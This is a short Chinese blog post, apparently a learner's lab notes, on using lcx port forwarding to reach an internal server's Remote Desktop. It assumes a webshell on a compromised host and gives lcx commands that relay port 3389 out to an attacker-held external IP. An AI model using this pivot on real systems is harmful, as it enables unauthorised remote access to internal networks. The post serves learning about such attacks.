【端口转发】利用lcx进行访问内网

0x01 前言

这周开始准备学习内网渗透的知识,昨天利用Vmware搭建了域环境,今天做了一个小实验,利用lcx端口转发来访问内网服务器。这里需要一个外网ip,所以去阿里云买了一个服务器,学生价9.9一个月还是挺不错的~

0x02 操作环境

内网服务器ip:192.168.80.3 端口3389
外网ip:x.x.x.x 端口:51(这里需要注意的是购买阿里云服务器之后一定要在安全组里定义一个开放入口的端口,否则的话是连接不到的,我就被坑了很久。。)

0x03 具体步骤

首先这里假设已经拿到了服务器的webshell了,那么就上传一个lcx.exe到肉鸡上,在终端输入

lcx.exe -slave x.x.x.x 51 192.168.80.3 3389

这里意思就是将内网192.168.80.3的3389端口转发到外网x.x.x.x的51端口

然后再本机上(注意这里本机需要外网ip,否则会失败)的终端输入

lcx.exe -listen 51 10000

这里意思是在本机上监听51端口并连接到10000端口(可以用别的端口)
本机需要10000端口是没有被其他程序使用的,可以使用命令:

netstat -an

查看

最后win+R,输入mstsc打开远程桌面,输入127.0.0.1:10000就可以连接到肉鸡了~~

P.S 要有一个需要注意的是,做实验的时候,肉鸡记得把远程桌面功能打开呀!

0x04 参考文献

http://www.freebuf.com/sectool/126967.html

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,803评论 19 139
  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 9,169评论 0 10
  • 来源:http://bbs.ichunqiu.com/thread-9492-1-1.html?from=ch 社...
    池寒阅读 7,482评论 0 4
  • 关于意外与惊喜,有许多的典故源起。脑海中冒出来“失之东隅收之桑榆”和“塞翁失马焉知非福”。如果描述得极端一些,生命...
    夏虫晨鸣阅读 1,634评论 0 0
  • 我的朋友小A最近一直在纠结,那个天天和她聊天的男孩子是不是喜欢她。她是喜欢他的她知道,但是他怎么想的却不清楚了……...
    树皮酱阅读 3,226评论 0 0

友情链接更多精彩内容